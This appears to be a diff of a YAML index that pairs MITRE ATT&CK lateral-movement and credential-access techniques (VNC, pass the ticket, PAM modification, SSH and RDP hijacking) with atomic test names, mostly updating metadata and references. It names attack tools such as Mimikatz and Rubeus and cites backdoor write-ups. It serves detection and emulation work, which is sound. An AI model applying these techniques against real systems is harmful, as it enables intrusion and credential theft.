       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests:
     - name: Enable Apple Remote Desktop Agent
@@ -84780,7 +85468,7 @@ lateral-movement:
         elevation_required: true
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -84805,11 +85493,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -84832,9 +85520,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -84885,7 +85572,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests:
     - name: ESXi - Enable SSH via PowerCLI
@@ -84992,7 +85678,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests:
     - name: USB Malware Spread Simulation
@@ -85085,7 +85770,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -85122,7 +85806,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -85153,8 +85837,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -85237,7 +85919,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests:
     - name: Map admin share
@@ -85362,7 +86043,7 @@ lateral-movement:
         elevation_required: true
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -85389,6 +86070,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -85406,12 +86088,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -85437,14 +86119,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -85562,7 +86243,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -85616,11 +86296,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -85672,14 +86351,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests:
     - name: Enable Windows Remote Management
@@ -85828,7 +86506,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests:
     - name: PowerShell Lateral Movement using MMC20
@@ -85900,7 +86577,7 @@ lateral-movement:
           '
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -85920,6 +86597,7 @@ lateral-movement:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -85927,7 +86605,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -85943,34 +86620,35 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests:
     - name: Mimikatz Kerberos Ticket Attack
@@ -86076,7 +86754,7 @@ lateral-movement:
           \"PathToAtomicsFolder\\..\\ExternalPayloads\\rubeus.exe\" purge      "
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -86101,12 +86779,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -86120,13 +86797,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -86143,7 +86819,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -86191,7 +86867,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -86224,7 +86900,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests:
     - name: Radmin Viewer Utility
@@ -86368,7 +87043,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -86402,12 +87077,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -86435,10 +87108,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -86468,7 +87140,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -86530,7 +87201,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests:
     - name: Exfiltration Over SMB over QUIC (New-SmbMapping)
@@ -86585,7 +87255,7 @@ lateral-movement:
         elevation_required: true
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -86609,11 +87279,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -86638,9 +87307,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -86700,7 +87368,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests:
     - name: RDP hijacking
@@ -86781,7 +87448,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests:
     - name: Mimikatz Pass the Hash
@@ -86969,7 +87635,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests:
     - name: RDP to DomainController
@@ -87099,7 +87764,7 @@ lateral-movement:
         name: command_prompt
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -87156,6 +87821,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -87166,13 +87832,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -87231,7 +87896,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -87325,49 +87989,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -87382,20 +88007,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
